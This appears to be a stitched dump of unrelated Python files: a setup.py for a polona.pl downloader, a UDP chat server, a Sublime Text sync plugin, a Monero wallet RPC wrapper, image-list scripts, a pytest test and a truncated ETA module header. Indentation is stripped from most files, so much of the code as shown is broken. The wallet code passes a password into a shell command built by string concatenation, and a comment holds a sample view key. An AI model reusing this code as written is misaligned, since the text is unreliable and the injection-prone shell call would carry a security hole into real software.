"""Get requirements from pip requirement files."""
requirements = set()
with open(get_absolute_path(*args)) as handle:
for line in handle:
# Strip comments.
line = re.sub(r'^#.*|\s#.*', '', line)
# Add git handles
line = re.sub(r'git\+(.*?)@(.*?)#egg=([^\-]+)($|([\-]?.*))', r'\3 @ git+\1@\2#egg=\3\4', line)
# Ignore empty lines
if line and not line.isspace():
requirements.add(re.sub(r'\s+', '', line))
print(requirements)
return sorted(requirements)
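# Illustrative sketch (not part of the original setup.py): shows what the git rewrite in
# get_requirements() does to a VCS requirement line. The package name and repository URL
# are made up.
def _example_git_requirement_rewrite():
    line = 'git+https://github.com/example/somepkg.git@main#egg=somepkg'
    return re.sub(
        r'git\+(.*?)@(.*?)#egg=([^\-]+)($|([\-]?.*))',
        r'\3 @ git+\1@\2#egg=\3\4',
        line,
    )  # -> 'somepkg @ git+https://github.com/example/somepkg.git@main#egg=somepkg'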
def get_absolute_path(*args):
"""Transform relative pathnames into absolute pathnames."""
directory = os.path.dirname(os.path.abspath(__file__))
return os.path.join(directory, *args)
setup(
name=APP,
author='Adam Twardoch',
author_email='adam+github@twardoch.com',
url='https://twardoch.github.io/%s/' % APP,
project_urls={
'Source': "https://github.com/twardoch/%s" % APP
},
version=get_version(),
license="MIT",
description="Image downloader for the polona.pl website of the Polish National Library",
long_description=readme,
long_description_content_type='text/markdown',
python_requires='>=3.9',
install_requires=get_requirements('requirements.txt'),
extras_require={
'dev': [
'twine>=3.4.1',
'pyinstaller>=4.2',
'dmgbuild>=1.4.2; sys_platform == "darwin"'
]
},
packages=find_packages(),
classifiers=[
'Environment :: Console',
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.9',
],
keywords='polona jpeg downloader cli',
entry_points='''
[console_scripts]
%(cli)s=%(name)s.__main__:main
    ''' % {'cli': CLI, 'name': APP}
)
|
from expdir_monitor.expdir_monitor import ExpdirMonitor
import argparse
"""
Given an expdir, run the experiment
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'--test', action='store_true',
help='Test model for required dataset if pretrained model exists.'
)
parser.add_argument(
'--valid', action='store_true',
)
parser.add_argument(
'--valid_size', type=int, default=-1,
)
parser.add_argument('--path', type=str)
parser.add_argument('--restore', action='store_true')
args = parser.parse_args()
expdir_monitor = ExpdirMonitor(args.path)
test_performance = expdir_monitor.run(pure=False, restore=args.restore, test=args.test, valid=args.valid,
valid_size=args.valid_size)
if args.valid:
print('validation performance: %s' % test_performance)
else:
print('test performance: %s' % test_performance)
|
import typing
def get_mx(
bit: typing.List[int],
i: int,
) -> int:
mx = -(1 << 50)
while i > 0:
mx = max(mx, bit[i])
i -= i & -i
return mx
def set_val(
bit: typing.List[int],
i: int,
x: int,
) -> typing.NoReturn:
while i < len(bit):
bit[i] = max(bit[i], x)
i += i & -i
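# Hedged illustration (not part of the original submission): this binary indexed tree
# stores prefix maximums, so get_mx(bit, i) returns the largest value set so far among
# positions 1..i. The positions and values below are arbitrary.
def _example_bit_prefix_max() -> None:
    bit = [-(1 << 50)] * 9  # supports positions 1..8
    set_val(bit, 3, 7)
    set_val(bit, 5, 2)
    assert get_mx(bit, 4) == 7
    assert get_mx(bit, 2) == -(1 << 50)  # nothing set at positions 1..2 yet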
def solve(
n: int,
h: typing.List[int],
a: typing.List[int],
) -> typing.NoReturn:
indices = sorted(
range(n),
key=lambda i: h[i],
)
inf = 1 << 50
bit = [-inf] * (n + 1)
for i in indices:
v = get_mx(bit, i + 1)
a[i] = max(a[i], a[i] + v)
set_val(bit, i + 1, a[i])
print(max(a))
def main() -> typing.NoReturn:
n = int(input())
*h, = map(
int, input().split(),
)
*a, = map(
int, input().split(),
)
solve(n, h, a)
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Problem to solve:
# Description: receive two kinds of messages from clients: an initial "introduce
# yourself" message, and thereafter any broadcast messages (sent to the public chat room).
# Exceptions:
# PDL (program design language):
# Abstract PDL: determine the message type. Introduction --> spawn a new dedicated child
# process, which then handles all further communication with that client; broadcast -->
# pass the data to the broadcast process.
# Concrete PDL:
# Data conventions:
# The username reported by a client, after de-duplication by the server parent process,
# identifies the client to the server and distinguishes users in the view layer. Usernames
# are normally human-readable; the server checks for duplicates and disambiguates later
# duplicates by appending a suffix such as (1) or (2).
# Introduction message format: self:{username}:{any info}
# Broadcast request format: broadcast:{username}:{info wanted to send}; note: broadcast
# messages are ordered by the time they actually reach each client.
# Unicast datagram format: {time of client msg creating}:{friendusername}:{info wanted to send};
# note: the receiving client is responsible for ordering unicast messages.
# Server reply to a client introduction: server:{checkedusername}:{any info}
# Server-assembled unicast message: {time of client msg creating}:{sourceusername}:{info from source client}
# Server-assembled broadcast message: {sourceusername}:{info wanted to send}
#
# Server parent process:
# 0. Maintains the broadcast message queue bdcast_msgs_q, the info of all connected
#    clients all_clients, and the per-client message queues (Pipes) cli_cli_msgs_ps.
# 1. Creates the child process that handles broadcasting.
# 2. For a new client introduction (a custom username must be supplied), updates
#    all_clients, resolves username collisions (renaming duplicates with a (1)/(2)
#    suffix), creates a dedicated child process, hands it the checked username, and
#    returns the checked username to the client.
# 3. For a broadcast message, puts it on the broadcast queue bdcast_msgs_q for the
#    broadcast child process to consume.
#    (How do clients receive broadcasts???)
#
# Dedicated child process:
# Sends back to the client the confirmation of its username, together with the address
# sonAddr of this dedicated child process to be used for all further (unicast) traffic.
# (The client must confirm that its introduction succeeded, settle on its final username,
# and use sonAddr for all subsequent communication.)
# When a unicast message arrives, looks up the receiving client by the username supplied
# by the sender, processes the message, and puts it on that client's message queue.
# (The receiving client must parse the unicast datagram itself to identify the sender's
# username.)
#
import socket
import multiprocessing as mp
import threading as th
import re
import time
HOST = '192.168.2.102'
PORT = 1069
BUFSIZE = 65536
cli_bdcast_port = 1069
msgType = {'self': 'self', 'broadcast': 'broadcast'}
# Addresses of all clients that have introduced themselves to the server, {username: addr};
# username is the (de-duplicated) name each client reported, addr is that client's address.
all_clients = {}
def main():
"""创建广播进程,启动UDPServer,判断接受到的消息类型,并启动相应进程或传送数据给广播进程"""
# 等待广播的消息队列,消息项是字符串,格式 {sourcename}:{info want to broadcast}
bdcast_msgs_q = mp.Queue()
# 客户端到客户端间会话消息管道{key, aPipes}, 每个客户端定向进程有一个Pipes; key是所定向的客户端addr
cli_cli_msgs_ps = {}
# 创建广播进程
create_br_p(bdcast_msgs_q, cli_bdcast_port)
# 启动UDPServer父进程
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((HOST, PORT))
    # The UDP server receives requests from clients.
while True:
data, addr = s.recvfrom(BUFSIZE)
        dtype = _msg_type(data.decode('utf-8'))
        # If the message is an introduction, create a dedicated service process.
        if dtype == msgType['self']:
            # De-duplicate the client's username.
            uname = data.decode('utf-8').split(':')[1].strip()
            cli_name = _rename_cli(uname)
            # Record the client under its (possibly renamed) username.
            all_clients[cli_name] = addr
            # Create the dedicated service process; do not join it, or this loop would block.
            di_server = mp.Process(target=create_di_p, args=(addr, cli_name, cli_cli_msgs_ps, cli_name))
            di_server.daemon = True
            di_server.start()
        # If the message is a broadcast request, put it on the broadcast queue.
        # Incoming format: broadcast:{username}:{info wanted to send}
        # Queued format:   {sourceusername}:{info wanted to send}
        if dtype == msgType['broadcast']:
            cdata = data.decode('utf-8')
            # Strip the leading 'broadcast:' so the queued item is '{sourceusername}:{info}';
            # broct_task() slices it into datagram-sized fragments before sending.
            bdcast_msgs_q.put(cdata[cdata.find(':') + 1:])
def _rename_cli(name):
    # If the name is not taken yet, keep it; otherwise append a numeric suffix.
    if name.strip() not in all_clients:
        return name
next_ind = 1
for it in all_clients.keys():
m = re.match(r'(.*)(\((\d*)\))$', it)
if m:
results = m.groups()
if results[0].strip() == name:
t = int(results[2]) + 1
if t > next_ind:
next_ind = t
return '{}({})'.format(name, next_ind)
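# Hedged illustration (not part of the original server): _rename_cli reads the module-level
# all_clients dict, so this sketch temporarily fills it with throwaway entries to show the
# intended suffixing behaviour, then clears it again. Addresses are placeholders.
def _example_rename_cli():
    all_clients.clear()
    all_clients['alice'] = ('127.0.0.1', 40000)
    all_clients['alice(1)'] = ('127.0.0.1', 40001)
    renamed = _rename_cli('alice')  # expected: 'alice(2)'
    all_clients.clear()
    return renamed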
def create_br_p(bdcast_msgs_q, bdcast_port):
"""创建广播进程"""
bdcast_p = mp.Process(target=broct_task, args=(bdcast_msgs_q, bdcast_port))
    bdcast_p.daemon = True
    # Do not join here: joining would block main() before the UDP server ever starts.
    bdcast_p.start()
def create_di_p(cli_addr, cli_name, cli_cli_msgs_ps, additional='directional msg'):
"""创建定向服务进程:
Args:
cli_addr: tuple(host,port), 定向服务进程所指向的客户端地址
cli_name: 客户端名称
additional: 字符串,该子进程创建后第一次响应客户端的自报家门请求时,fu带的消息
"""
pipe = mp.Pipe()
cli_cli_msgs_ps[cli_addr] = pipe
    # First reply to the client's connection request.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(cli_addr)
msg = 'server:{}:{}'.format(cli_name, additional).encode('utf-8')
s.sendto(msg, cli_addr)
    # Receive requests from the client.
    threcv = th.Thread(target=_recv_msg_task, args=(s, cli_name, cli_cli_msgs_ps))
    threcv.start()
    # Reply to the client's requests.
    thsend = th.Thread(target=_send_msg_task, args=(s, cli_addr, cli_cli_msgs_ps))
    thsend.start()
    threcv.join()
    thsend.join()
def _recv_msg_task(sock, cli_name, cli_cli_msgs_ps):
"""接收并处理定向的客户端的消息"""
while True:
        # Data format: {time of client msg creating}:{friendusername}:{info wanted to send}
data, addr = sock.recvfrom(BUFSIZE)
        # Look up the client this message is addressed to.
        cdata = data.decode('utf-8')
        funame = cdata.split(':')[1]
        faddr = all_clients[funame]
        # Assemble the outgoing message:
        # {time of client msg creating}:{sourceusername}:{info from source client}
        second_sep = cdata.find(':', cdata.find(':') + 1)
        b_msg = cdata[second_sep + 1:].encode('utf-8')
        per_add = [str(time.time()).encode('utf-8'), cli_name.encode('utf-8')]
        msgs = _slice_msg(b_msg, *per_add)
        # Put the messages on the target client's pipe.
friend_pipe = cli_cli_msgs_ps[faddr][0]
for it in msgs:
friend_pipe.send(it)
def _send_msg_task(sock, cli_addr, cli_cli_msgs_ps):
"""响应定向客户端的消息"""
pipe = cli_cli_msgs_ps[cli_addr][1]
while True:
sock.sendto(pipe.recv(), cli_addr)
def broct_task(q, prot):
"""将广播消息队列中的消息广播出去。
Args:
q: queue, 即将被转发消息的队列,每一项是一个str
prot: 广播端口
"""
brocast_s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
brocast_s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
msg = q.get()
sep_index = msg.find(':')
cli_name = msg[0:sep_index]
slices = _slice_msg(msg[sep_index + 1:].encode('utf-8'), cli_name.encode('utf-8'))
for it in slices:
brocast_s.sendto(it, ('<broadcast>', prot))
def _slice_msg(b_msg, *per_add, maxlen=1474):
""" 将要广播的消息进行分片,避免广播数据太大而导致的广播失败.
Args:
b_msg: str, 要进行广播的二进制字符串消息
per_add: str, 要在每个分片上额外添加的二进制数据,用于组合分片消息的头部
maxlen: int, 分片之后的每个二进制消息的最大长度,其取值方法为1500-报文中udp或tcp头的大小,一般无需更改
Returns:
list: 广播的消息分片结果,所有数据项都是二进制的,格式 'head:msgxxx'
"""
result = []
tlt_add_len = 0
head = b''
for it in per_add:
tlt_add_len += len(it)
head += it
msg_max_len = maxlen - tlt_add_len - len(per_add) * len(':'.encode('utf-8'))
while len(b_msg) > msg_max_len:
result.append(head + ':'.encode('utf-8') + b_msg[0:msg_max_len])
b_msg = b_msg[msg_max_len:]
result.append(head + ':'.encode('utf-8') + b_msg)
return result
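# Hedged illustration (not part of the original server): shows how _slice_msg prepends the
# header fields and splits an oversized payload. maxlen=16 is deliberately tiny so the split
# is visible; the real default is 1474.
def _example_slice_msg():
    chunks = _slice_msg('hello world, this is a long payload'.encode('utf-8'),
                        'alice'.encode('utf-8'), maxlen=16)
    # Every chunk starts with b'alice:' followed by at most 10 payload bytes.
    return chunks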
def _msg_type(msg):
"""判断用户请求消息的类型: 分2种
自报家门的消息格式: self:username:xxx,
广播的消息格式: broadcast:username:info data .
Args:
msg: str, 消息字符串
Returns:
str: 两种字符串 ‘self’ 或 ‘broadcast’
"""
li = msg.split(':')
if len(li) > 1 and li[0] == msgType['self']:
return msgType['self']
if len(li) > 1 and li[0] == msgType['broadcast']:
return msgType['broadcast']
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
from fnmatch import fnmatch
import os
import requests
import shutil
import sublime
import threading
import time
from .libs import path, settings
from .libs.logger import logger
from queue import Queue
def get_content(file):
if not path.exists(file):
return ''
try:
with open(file, 'rb') as fi:
            # TODO: Figure out how to handle these kinds of errors (for now, ignore them)
            # `UnicodeDecodeError: 'utf-8' codec can't decode byte 0x86 in position 23: invalid start byte`
return fi.read().decode('utf-8', errors='ignore')
except Exception as e:
logger.warning('file `{}` has errors'.format(file))
logger.exception(e)
return ''
def should_exclude(file_name):
patterns = settings.get('excluded_files') or []
# copy list to avoid side effects
p = patterns[:]
    # always exclude the SyncSettings.sublime-settings file to avoid unwanted changes
p.extend(['*SyncSettings.sublime-settings'])
for pattern in p:
if fnmatch(file_name, pattern):
return True
return False
def should_include(file_name):
patterns = settings.get('included_files') or []
# copy list to avoid side effects
for pattern in patterns:
        # always ignore the SyncSettings.sublime-settings file to avoid unwanted changes
if fnmatch(file_name, '*SyncSettings.sublime-settings'):
return False
if fnmatch(file_name, pattern):
return True
return False
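# Hedged illustration (not part of the plugin): should_exclude() and should_include() both
# reduce to fnmatch checks against the configured pattern lists, with the plugin's own
# *SyncSettings.sublime-settings file always excluded. This sketch reproduces the matching
# with hand-written pattern lists, since the real functions read them from the Sublime
# settings at runtime.
def _example_pattern_matching():
    excluded = ['*.pyc', '*SyncSettings.sublime-settings']
    included = ['Preferences.sublime-settings']
    name = 'Preferences.sublime-settings'
    is_excluded = any(fnmatch(name, p) for p in excluded)
    is_included = any(fnmatch(name, p) for p in included)
    # Mirrors get_files(): a file is skipped only when it is excluded and not re-included.
    return not (is_excluded and not is_included)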
def get_files():
files_with_content = dict()
user_path = path.join(sublime.packages_path(), 'User')
for f in path.list_files(user_path):
encoded_path = path.encode(f.replace('{}{}'.format(user_path, path.separator()), ''))
if encoded_path in files_with_content:
continue
if should_exclude(f) and not should_include(f):
continue
content = get_content(f)
if not content.strip():
continue
files_with_content[encoded_path] = {'content': content, 'path': f}
return files_with_content
def download_file(q):
while not q.empty():
url, name = q.get()
try:
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(name, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
except: # noqa: E722
pass
finally:
q.task_done()
def fetch_files(files, to=''):
if not path.exists(to, folder=True):
os.mkdir(to)
else:
shutil.rmtree(to, ignore_errors=True)
rq = Queue(maxsize=0)
user_path = path.join(sublime.packages_path(), 'User')
items = files.items()
for k, file in items:
decoded_name = path.decode(k)
name = path.join(user_path, decoded_name)
if should_exclude(name) and not should_include(name):
continue
rq.put((file['raw_url'], path.join(to, k)))
threads = min(10, len(items))
for i in range(threads):
worker = threading.Thread(target=download_file, args=(rq,))
worker.setDaemon(True)
worker.start()
time.sleep(0.1)
rq.join()
def move_files(origin):
user_path = path.join(sublime.packages_path(), 'User')
for f in os.listdir(origin):
        # defer Preferences and Package Control files; they are moved last (see pending_files below)
if fnmatch(f, '*Preferences.sublime-settings') or fnmatch(f, '*Package%20Control.sublime-settings'):
continue
name = path.join(user_path, path.decode(f))
directory = os.path.dirname(name)
if not path.exists(directory, True):
os.makedirs(directory)
shutil.move(path.join(origin, f), name)
pending_files = ['Preferences.sublime-settings', 'Package%20Control.sublime-settings']
for f in pending_files:
if not path.exists(path.join(origin, f)):
continue
shutil.move(path.join(origin, f), path.join(user_path, path.decode(f)))
|
import requests as req
import json
from . import classes
from .. import utils
import subprocess
import time
import os
def newWalletFromViewKey(address, view_key, wallet_dir, wallet_file, wallet_pass):
    ''' newWalletFromViewKey(address, view_key, wallet_dir, wallet_file, wallet_pass) :: initialize a
    new wallet using simplewallet from a view key and address, then exit. '''
# Create subprocess call for simplewallet in screen
# simplewallet --generate-from-view-key 46BeWrHpwXmHDpDEUmZBWZfoQpdc6HaERCNmx1pEYL2rAcuwufPN9rXHHtyUA4QVy66qeFQkn6sfK8aHYjA3jk3o1Bv16em:e422831985c9205238ef84daf6805526c14d96fd7b059fe68c7ab98e495e5703:wallet000001.bin --password 12345678 exit
#subprocess_call = ['screen','simplewallet', '--generate-from-view-key',
# address+':'+view_key+':'+wallet_file, '--password', wallet_pass, 'exit']
# Call subprocess
#try:
#subprocess.call(subprocess_call, cwd=wallet_dir)
os.chdir(wallet_dir)
os.system('simplewallet --generate-from-view-key ' + address+':'+view_key+':'+wallet_file + ' --password ' + wallet_pass)
# message = "New view-only wallet '" + wallet_file + "' successfully created."
# return message, 0
#except:
# error = utils.ErrorMessage("Error starting simplewallet.")
# return error, 1
def startWallet(wallet, wallet_file, wallet_pass, wallet_name=None):
''' startWallet() :: initialize simplewallet for a wallet that already exists. '''
# Setup timer for launching wallet
start = time.time()
# Trim "http(s)://" from wallet.HOST for simplewallet ip
wallet_ip = wallet.HOST
wallet_ip = wallet_ip.replace("http://","")
wallet_ip = wallet_ip.replace("https://","")
# Create subprocess call for simplewallet in screen
subprocess_call = ["screen"]
if wallet_name is not None:
subprocess_call.extend(["-S", wallet_name])
subprocess_call.extend(["-dm", "simplewallet",
"--wallet-file", wallet_file,
"--password", wallet_pass,
"--rpc-bind-ip", wallet_ip,
"--rpc-bind-port", wallet.PORT])
# Call subprocess
try:
subprocess.call(subprocess_call)
except:
error = utils.ErrorMessage("Error starting simplewallet.")
return error, 1
err = 1
k = 0
while err != 0:
        wallet_height, err = getWalletHeight(wallet)
k += 1
if k > 150: # Takes longer than 5 seconds to start simplewallet
error = utils.ErrorMessage("Error connecting simplewallet.")
return error, 1
time.sleep(0.2)
dt = time.time() - start
message = 'Wallet started successfully in ' + str(dt) + ' seconds'
return message, 0
def walletJSONrpc(wallet, rpc_input):
''' walletJSONrpc() :: Send wallet JSON_RPC method and process initial result. '''
# Add standard rpc values
rpc_input.update(wallet.RPC_STANDARD_VALUES)
# Execute the rpc request and return response output
try:
resp = req.post(wallet.RPC_URL,data=json.dumps(rpc_input),headers=wallet.RPC_STANDARD_HEADER)
output = resp.json()
# print(json.dumps(output, indent=2))
# Return result or error message from rpc call
if "result" in output:
result = output["result"]
return result, 0
else:
error = utils.ErrorMessage(output["error"]["message"])
code = output["error"]["code"]
if code == 0:
code = -1
return error, code
except:
        result = utils.ErrorMessage("Error returning result from 'walletJSONrpc'.")
return result, 1
def getWalletBalance(wallet):
''' getWalletBalance() :: Function that returns "getbalance" rpc call info. '''
# Create rpc data input
rpc_input = { "method": "getbalance" }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
wallet_balance = classes.WalletBalance(result)
return wallet_balance, 0
except:
            error = utils.ErrorMessage("Error returning result from 'getWalletBalance'.")
return error, 1
else:
return result, err
def getWalletAddress(wallet):
''' getWalletAddress() :: Function that returns "getaddress" rpc call info. '''
# Create rpc data input
rpc_input = { "method": "getaddress" }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
address = result["address"]
return address, 0
except:
            error = utils.ErrorMessage("Error returning result from 'getWalletAddress'.")
return error, 1
else:
return result, err
def getWalletHeight(wallet):
''' getWalletHeight() :: Function that returns "getheight" rpc call info. '''
# Create rpc data input
rpc_input = { "method": "getheight" }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
return result["height"], 0
except:
            error = utils.ErrorMessage("Error returning result from 'getWalletHeight'.")
return error, 1
else:
return result, err
def getPayments(wallet, payment_id):
''' getPayments() :: Returns payments to wallet matching payment_id using "get_payments" rpc call. '''
# Create rpc data input
rpc_input = { "method": "get_payments", "params": {"payment_id": payment_id} }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
payments = []
for i in range(0, len(result["payments"])):
payments.append(classes.Payment(result["payments"][i]))
return payments, 0
except:
            error = utils.ErrorMessage("Error returning result from 'getPayments'.")
return error, 1
else:
return result, err
def getBulkPayments(wallet, pay_ids):
''' getBulkPayments() :: Returns payments to wallet matching payment_id using "get_bulk_payments" rpc call.
"pay_ids" can either be a single payment ID string, or an array of payment ID strings.
This method is preferred over the getPayments() option. '''
# Make sure payment_ids is an array
if isinstance(pay_ids, str):
payment_ids = [ pay_ids ]
else:
        payment_ids = pay_ids
# Create rpc data input
rpc_input = { "method": "get_bulk_payments", "params": {"payment_ids": payment_ids} }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
payments = []
for i in range(0, len(result["payments"])):
payments.append(classes.Payment(result["payments"][i]))
return payments, 0
except:
            error = utils.ErrorMessage("Error returning result from 'getBulkPayments'.")
return error, 1
else:
return result, err
def incomingTransfers(wallet, transfer_type):
    ''' incomingTransfers() :: Get received transactions (transfer_type = "all", "available", or "unavailable"). '''
    # Create rpc data input
    rpc_input = { "method": "incoming_transfers", "params": {"transfer_type": transfer_type} }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
print(err)
print(json.dumps(result,indent=2))
# Return formatted result
if err == 0:
try:
print(len(result["transfers"]))
#print(json.dumps(result))
#payments = []
#for i in range(0, len(result["payments"])):
# payments.append(classes.Payment(result["payments"][i]))
#return payments, 0
except:
            error = utils.ErrorMessage("Error returning result from 'incomingTransfers'.")
return error, 1
else:
print(result.error)
#return result, err
def makeTransfer(wallet, receive_addresses, amounts_atomic, payment_id, mixin):
''' makeTransfer() :: Make transaction(s) (Note: 1 Coin = 1e12 atomic units). '''
# Prep destinations rpc array
destinations, err = _setupDestinations(receive_addresses, amounts_atomic)
if err != 0:
return destinations, err
# Create rpc data input
params = { "destinations": destinations, "mixin": mixin, "payment_id": payment_id}
rpc_input = { "method": "transfer", "params": params }
print(json.dumps(rpc_input, indent=2))
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
transfer_result = classes.TransferResult(result)
return transfer_result, 0
except:
            error = utils.ErrorMessage("Error returning result from 'makeTransfer'.")
return error, 1
else:
return result, err
def makeTransferSplit(wallet, receive_addresses, amounts_atomic, payment_id, mixin):
''' makeTransferSplit() :: Make transaction(s), split up (Note: 1 Coin = 1e12 atomic units). '''
# Prep destinations rpc array
dests, err = _setupDestinations(receive_addresses, amounts_atomic)
if err != 0:
return dests, err
# Create rpc data input
params = { "destinations": dests, "mixin": mixin, "payment_id": payment_id, "new_algorithm": False }
rpc_input = { "method": "transfer_split", "params": params }
print(json.dumps(rpc_input, indent=2))
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
transfer_result = classes.TransferResult(result)
return transfer_result, 0
except:
            error = utils.ErrorMessage("Error returning result from 'makeTransferSplit'.")
return error, 1
else:
return result, err
def _setupDestinations(receive_addresses, amounts_atomic):
''' _setupDestination :: Put receive_addresses and amounts_atomic into destinations array '''
# Make sure receive_addresses is an array
if isinstance(receive_addresses, str):
recipients = [ receive_addresses ]
else:
recipients = receive_addresses
# Make sure amounts_atomic is an array
if isinstance(amounts_atomic, int):
amounts = [ amounts_atomic ]
else:
amounts = amounts_atomic
# Make sure number of recipients matches number of amounts
N_recipients = len(recipients)
if N_recipients != len(amounts):
error = utils.ErrorMessage("Error: Number of recipients does not match number of amounts.")
return error, 1
# Fill out destinations for rpc data input
destinations = []
for i in range(0, N_recipients):
destinations.append({"address": recipients[i], "amount": amounts[i]})
return destinations, 0
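# Hedged usage sketch (not from the original module): shows the destinations array that
# _setupDestinations() builds for the "transfer"/"transfer_split" RPC calls. The address
# strings and atomic amounts are placeholders.
def _exampleSetupDestinations():
    addresses = ['9wAddressOne...', '9wAddressTwo...']
    amounts = [1000000000000, 250000000000]  # 1.0 and 0.25 coins in atomic units
    destinations, err = _setupDestinations(addresses, amounts)
    # destinations == [{'address': ..., 'amount': ...}, ...], err == 0
    return destinations, err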
def queryKey(wallet, key_type):
''' queryKey() :: Returns key info of type "key_type" ("mnemonic" or "view_key"). '''
# Create rpc data input
rpc_input = { "method": "query_key", "params": {"key_type": key_type} }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
return result["key"], 0
except:
            error = utils.ErrorMessage("Error returning result from 'queryKey'.")
return error, 1
else:
return result, err
def sweepDust(wallet):
''' sweepDust() :: Get all wallet inputs that are too small and sweep. '''
# Create rpc data input
rpc_input = { "method": "sweep_dust" }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
return result["tx_hash_list"], 0
except:
            error = utils.ErrorMessage("Error returning result from 'sweepDust'.")
return error, 1
else:
return result, err
def stopWallet(wallet):
''' stopWallet() :: Cleanly disconnect simplewallet from daemon and exit. '''
# Create rpc data input
rpc_input = { "method": "stop_wallet" }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
return result, 0
except:
            error = utils.ErrorMessage("Error returning result from 'stopWallet'.")
return error, 1
else:
return result, err
def rescanBlockchain(wallet):
''' rescanBlockchain() :: Re-scan blockchain for wallet transactions from genesis. '''
# Create rpc data input
rpc_input = { "method": "rescan_blockchain" }
# Get RPC result
result, err = walletJSONrpc(wallet, rpc_input)
# Return formatted result
if err == 0:
try:
return result, 0
except:
            error = utils.ErrorMessage("Error returning result from 'rescanBlockchain'.")
return error, 1
else:
return result, err
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import glob
import random
for age in range(16, 55):
    # Baseball players
    # Path to load from
    load_path = './data/baseball_player_list_age' + str(age) + '.txt'
    # Path to save to
    save_path = './data/baseball_image_path_list_age' + str(age) + '.txt'
person_path_list = []
with open(load_path, 'r') as f:
for line in f:
person_data = line.strip().split(',')
if len(person_data) == 3:
person_path_list.append(person_data[1])
    # Shuffle
random.shuffle(person_path_list)
baseball_num = len(person_path_list)
    # Save to a text file
with open(save_path, 'w') as f:
for person_path in person_path_list:
person_img_path_list = glob.glob('./image/' + person_path + '/*.jpg')
for person_img_path in person_img_path_list:
f.write(person_img_path + '\n')
print('[Save] {0}'.format(save_path))
    # Football players
    # Path to load from
    load_path = './data/football_player_list_age' + str(age) + '.txt'
    # Path to save to
    save_path = './data/football_image_path_list_age' + str(age) + '_origin.txt'
person_path_list = []
with open(load_path, 'r') as f:
for line in f:
person_data = line.strip().split(',')
if len(person_data) == 3:
person_path_list.append(person_data[1])
    # Shuffle
random.shuffle(person_path_list)
person_path_list = person_path_list
    # Save to a text file
with open(save_path, 'w') as f:
for person_path in person_path_list:
person_img_path_list = glob.glob('./image/' + person_path + '/*.jpg')
for person_img_path in person_img_path_list:
f.write(person_img_path + '\n')
    # Path to save to
save_path = './data/football_image_path_list_age' + str(age) + '.txt'
person_path_list = []
with open(load_path, 'r') as f:
for line in f:
person_data = line.strip().split(',')
if len(person_data) == 3:
person_path_list.append(person_data[1])
    # Shuffle
random.shuffle(person_path_list)
person_path_list = person_path_list[:baseball_num]
    # Save to a text file
with open(save_path, 'w') as f:
for person_path in person_path_list:
person_img_path_list = glob.glob('./image/' + person_path + '/*.jpg')
for person_img_path in person_img_path_list:
f.write(person_img_path + '\n')
print('[Save] {0}'.format(save_path))
|
import pytest
import warnings
import offlinetb
def test_capture_warnings(recwarn):
warnings.simplefilter('always')
try:
f()
except CustomException:
tb = offlinetb.distill(var_depth=4)
[v] = [v for v in tb['traceback'][-1]['vars'] if v['name'] == 's']
assert v['vars'][0]['value'] == "'hi'"
assert len(recwarn) == 0
def f():
g()
def g():
class Something(object):
@property
def prop(self):
warnings.warn('deprecated', DeprecationWarning)
return 'hi'
s = Something() # pylint: disable=unused-variable
raise CustomException()
class CustomException(Exception):
pass
|
#!/usr/bin/env python
"""
A module that uses an `eta.core.learning.VideoFramesClassifier` to classify the
frames of a video using a sliding window strategy.
Info:
type: eta.core.types.Module
version: 0.1.0
Copyright 2017-2022, Voxel51, Inc.
voxel51.com
"""
# pragma pylint: disable=redefined-builtin
# pragma pylint: disable=unused-wildcard-import
# pragma pylint: disable=wildcard-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import *
from future.utils import iteritems
# pragma pylint: enable=redefined-builtin
# pragma pylint: enable=unused-wildcard-import
# pragma pylint: enable=wildcard-import
from collections import defaultdict, deque
import logging
import sys
from eta.core.config import Config
import eta.core.data as etad
import eta.core.learning as etal
import eta.core.module as etam
import eta.core.video as etav
logger = logging.getLogger(__name__)
class ModuleConfig(etam.BaseModuleConfig):
"""Module configuration settings.
Attributes:
data (DataConfig)
parameters (ParametersConfig)
"""
def __init__(self, d):
super(ModuleConfig, self).__init__(d)
self.data = self.parse_object_array(d, "data", DataConfig)
self.parameters = self.parse_object(d, "parameters", ParametersConfig)
class DataConfig(Config):
"""Data configuration settings.
Inputs:
video_path (eta.core.types.Video): the input video
input_labels_path (eta.core.types.VideoLabels): [None] an optional
input VideoLabels file to which to add the predictions
Outputs:
output_labels_path (eta.core.types.VideoLabels): a VideoLabels file
containing the predictions
"""
def __init__(self, d):
self.video_path = self.parse_string(d, "video_path")
self.input_labels_path = self.parse_string(
d, "input_labels_path", default=None
)
self.output_labels_path = self.parse_string(d, "output_labels_path")
class ParametersConfig(Config):
"""Parameter configuration settings.
Parameters:
classifier (eta.core.types.VideoFramesClassifier): an
`eta.core.learning.VideoFramesClassifierConfig` describing the
